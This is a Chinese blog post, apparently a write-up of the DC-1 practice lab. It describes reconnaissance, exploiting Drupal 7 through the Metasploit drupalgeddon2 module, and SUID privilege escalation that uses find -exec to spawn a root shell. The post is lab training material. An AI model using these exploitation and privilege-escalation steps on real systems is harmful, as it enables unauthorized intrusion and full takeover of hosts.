zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
Delphi XE2 之 FireMonkey 入门(36) 控件基础: TForm
Delphi XE2 之 FireMonkey 入门(35) 控件基础: TFmxObject: 其它
Delphi XE2 之 FireMonkey 入门(39) 控件基础: TScrollBox、TVertScrollBox、TFramedScrollBox、TFramedVertScrollBox
人月神话之编程行业的乐趣与苦恼
基于NHibernate的三层结构应用程序开发初步
.NET设计模式(9):桥接模式(Bridge Pattern)
Grove,.NET中的又一个ORM实现
近期学习计划
.NET设计模式(8):适配器模式(Adapter Pattern)
[声明]关于春节回家期间不能更新Blog的说明
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
[网络收集]C#集合类(HashTable, Dictionary, ArrayList)与HashTable线程安全
[网络收集]ASP.NET中调用存储过程带(输入/输出)参数和返回值的一些常用的例子
[网络收集]asp.net中购物车的两种存储方式Session和Cookie的应用实例
[网络收集]Hashtable类、Hashtable的使用、
[网络收集]ASP.NET 2.0跨网页提交的三种方法
[网络收集]为了保护您眼睛视力,请对Vista/Win7/XP作如下设置
[网络收集]avascript中top.location.href 与 location.href的区别
[网络收集]C++随机数生成方法
[网络收集]利用Session对象实现购物车
[网络收集]Session+Hashtable实现购物车
热门文章
はじめてのSAStruts 1週目
FFmpeg filters 分析:简述
C++ 类成员函数的函数指针
Delphi XE2 之 FireMonkey 入门(38) 控件基础: TPopupMenu、TMenuItem、TMenuBar、TMainMenu
Delphi XE2 之 FireMonkey 入门(43) 控件基础: TStringGrid、TGrid
Delphi XE2 之 FireMonkey 入门(40) 控件基础: TMemo
Delphi XE2 之 FireMonkey 入门(41) 控件基础: TListBox
Delphi XE2 之 FireMonkey 入门(42) 控件基础: TComboBox、TComboEdit
Delphi XE2 之 FireMonkey 入门(37) 控件基础: TControl 概览
Delphi XE2 之 FireMonkey 入门(44) 控件基础: TTreeView、TTreeViewItem
Copyright © 2011-2022 走看看